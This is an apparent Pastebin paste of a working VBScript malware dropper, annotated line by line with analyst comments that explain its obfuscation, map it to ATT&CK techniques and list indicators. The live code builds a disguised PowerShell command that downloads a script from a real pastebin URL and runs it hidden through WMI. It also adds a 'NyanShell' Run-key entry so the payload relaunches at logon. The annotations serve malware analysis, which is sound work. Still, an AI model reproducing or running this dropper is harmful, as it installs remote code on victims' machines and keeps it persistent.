MestreQueda

Untitled

Mar 3rd, 2020
  1. ' ANALYST NOTE: VBScript dropper. It downloads a PowerShell script, runs it hidden, and persists it through an HKCU Run value.
  2. startupfolder="C:\Users\"+CreateObject(rev("krowteN.tpircSW")).UserName+"\AppData\Roaming\VHF.ps1"
  3. ' Line 2: rev("krowteN.tpircSW") yields "WScript.Network", so that ProgID never appears in clear text in the script.
  4. ' Despite its name, startupfolder holds a file path (C:\Users\<user>\AppData\Roaming\VHF.ps1), not the Startup folder.
  5. ' ATT&CK mapping: T1059.005 (Visual Basic), T1059.001 (PowerShell), T1047 (WMI), T1105 (Ingress Tool Transfer), T1547.001 (Run key), T1027 (obfuscation).
  6. ' Line 11 holds an obfuscated PowerShell command: 'KEX'.replace('K','I') yields "IEX" and `sal D $r` aliases D to it.
  7. ' The concatenated pieces form (&(GCM *W-O*)Net.WebClient).DownloadFile(...); the GCM *W-O* wildcard is meant to resolve to New-Object.
  8. ' Piped through D, the command saves hxxps://pastebin[.]com/raw/1it5wZYJ (defanged in this note) to $env:APPDATA\VHF.ps1.
  9. ' The string splitting and the alias keep "IEX", "DownloadFile" and "Net.WebClient" out of the literal text, so plain keyword matching on the file misses them.
  10. ' PowerShell script block logging (event 4104) should record the reassembled string handed to IEX; check it when triaging.
  11. gshjgjshsjhsusyuiweiwuwiuwiuiww = "Powershell $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://pastebin.com/raw/1it5wZYJ'',$env:APPDATA+''\\''+''VHF.ps1'')'|D|D"
  12. Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  13. ' Lines 12-19 start that command through WMI Win32_Process.Create, using a Win32_ProcessStartup instance whose ShowWindow is 0 (hidden).
  14. Set yeteuyeuehjehejehjehejenhjehejhejhejehje = objWMIService.Get("Win32_ProcessStartup")
  15. Set objConfig = yeteuyeuehjehejehjehejenhjehejhejhejehje.SpawnInstance_
  16. objConfig.ShowWindow = 0
  17. ' A process created through WMI is normally parented by WmiPrvSE.exe, not by wscript/cscript: hunt for WmiPrvSE.exe -> powershell.exe.
  18. Set objProcess = objWMIService.Get("Win32_Process")
  19. intReturn = objProcess.Create(gshjgjshsjhsusyuiweiwuwiuwiuiww, Null, objConfig, intProcessID)
  20. ' intReturn is never checked. Lines 21-22 then run the saved file with -executionpolicy bypass -noprofile -windowstyle hidden -noexit.
  21. Set objShell = CreateObject("Wscript.shell")
  22. objShell.run("powershell -executionpolicy bypass -noprofile -windowstyle hidden -noexit -file " + startupfolder)
  23. Set WshShell = CreateObject("WScript.Shell")
  24. WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\NyanShell","C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden -noexit -file " + startupfolder,"REG_SZ"
  25. ' Line 24 is the persistence step: the HKCU Run value "NyanShell" relaunches the same hidden PowerShell command at each logon of this user.
  26. ' Indicators on this page: %APPDATA%\VHF.ps1, Run value NyanShell, hxxps://pastebin[.]com/raw/1it5wZYJ. What VHF.ps1 itself does is not visible here.
  27. Function rev(Str) ' Returns Str with its characters in reverse order; line 2 uses it to hide a ProgID string.
  28. dsd="f" ' junk value, read only by the test on line 31
  29. ggh="gr" ' never read anywhere in this listing
  30. ' ddg is never assigned, so it is Empty and the comparison on line 31 is always False: the Then branch is dead padding.
  31. If dsd = ddg Then
  32. ' empty branch, never executed
  33.  
  34.  
  35. else
  36. ' Walk Str from its last character to its first, appending each one to reverseString.
  37. For i = Len(Str) To 1 Step -1
  38. Var = Mid(Str, i, 1)
  39. reverseString = reverseString & Var
  40. Next
  41. rev = reverseString
  42. ' Line 41 assigns to the function name, which is how a VBScript function sets its return value.
  43. End if
  44. End Function